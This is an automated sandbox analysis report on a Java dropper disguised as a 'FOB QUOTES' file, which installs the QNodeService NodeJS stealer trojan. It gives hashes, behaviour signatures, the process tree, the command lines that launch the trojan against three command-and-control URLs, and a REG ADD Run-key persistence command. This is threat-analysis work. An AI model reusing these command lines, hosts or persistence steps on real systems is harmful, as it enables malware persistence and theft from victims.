Analysis
-
max time kernel
130s -
max time network
150s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
13-07-2020 07:01
Static task
static1
Behavioral task
behavioral1
Sample
FOB QUOTES #092072DB6720.jar
Resource
win7
Behavioral task
behavioral2
Sample
FOB QUOTES #092072DB6720.jar
Resource
win10v200430
General
-
Target
FOB QUOTES #092072DB6720.jar
-
Size
11KB
-
MD5
e20d2d6fff672f1fd2350f2360a1545b
-
SHA1
712f836273a071a663ab7eae9f7970e26aa0a449
-
SHA256
54e843dde1d016b723f35de3ccf83e604edcfd9ba617da576de730f2ce971031
-
SHA512
8736ba22203332e491784a9271ec68c258f147f420b5bda7952d50920f25cab73b8a68144c57f981934098454cdeb99abe628b2d0e4d77e919d25b153d377ad6
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
node.exenode.exepid process 3796 node.exe 2560 node.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
node.exepid process 2560 node.exe 2560 node.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 11 wtfismyip.com 12 wtfismyip.com -
QNodeService
is a trojan written in NodeJS and spread via Java downloader. Utilizes stealer functionality.
-
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
java.exenode.execmd.exedescription pid process target process PID 1616 wrote to memory of 3796 1616 java.exe node.exe PID 1616 wrote to memory of 3796 1616 java.exe node.exe PID 3796 wrote to memory of 2128 3796 node.exe cmd.exe PID 3796 wrote to memory of 2128 3796 node.exe cmd.exe PID 2128 wrote to memory of 2484 2128 cmd.exe reg.exe PID 2128 wrote to memory of 2484 2128 cmd.exe reg.exe PID 3796 wrote to memory of 2560 3796 node.exe node.exe PID 3796 wrote to memory of 2560 3796 node.exe node.exe -
QNodeService NodeJS Trojan 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js family_qnodeservice -
Adds Run entry to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\qnodejs-62bf2258 = "cmd /D /C \"C:\\Users\\Admin\\qnodejs-node-v13.13.0-win-x64\\qnodejs\\qnodejs-62bf2258.cmd\"" reg.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
node.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe -
Loads dropped DLL 4 IoCs
Processes:
node.exepid process 2560 node.exe 2560 node.exe 2560 node.exe 2560 node.exe
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\FOB QUOTES #092072DB6720.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:[email protected] --register-startup --central-base-url https://payday.kozow.com --central-base-url https://lestero.hopto.org --central-base-url https://frendas.linkpc.net2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3796 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-62bf2258" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-62bf2258.cmd\"""3⤵
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-62bf2258" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-62bf2258.cmd\""4⤵
- Adds Run entry to start application
PID:2484 -
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:[email protected] --register-startup --central-base-url https://payday.kozow.com --central-base-url https://lestero.hopto.org --central-base-url https://frendas.linkpc.net3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Checks processor information in registry
- Loads dropped DLL
PID:2560
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js
-
\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\node_modules\ffi-napi\prebuilds\win32-x64\node.napi.node
-
\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\node_modules\native-reg\prebuilds\win32-x64\node.napi.node
-
\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\node_modules\ref-napi\prebuilds\win32-x64\node.napi.node
-
\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\node_modules\sqlite3\lib\binding\node-v79-win32-x64\node_sqlite3.node
-
memory/2128-110-0x0000000000000000-mapping.dmp
-
memory/2484-111-0x0000000000000000-mapping.dmp
-
memory/2560-112-0x0000000000000000-mapping.dmp
-
memory/2560-114-0x000001032B700000-0x000001032B701000-memory.dmpFilesize
4KB
-
memory/3796-106-0x0000000000000000-mapping.dmp
-
memory/3796-108-0x00000204ABAC0000-0x00000204ABAC1000-memory.dmpFilesize
4KB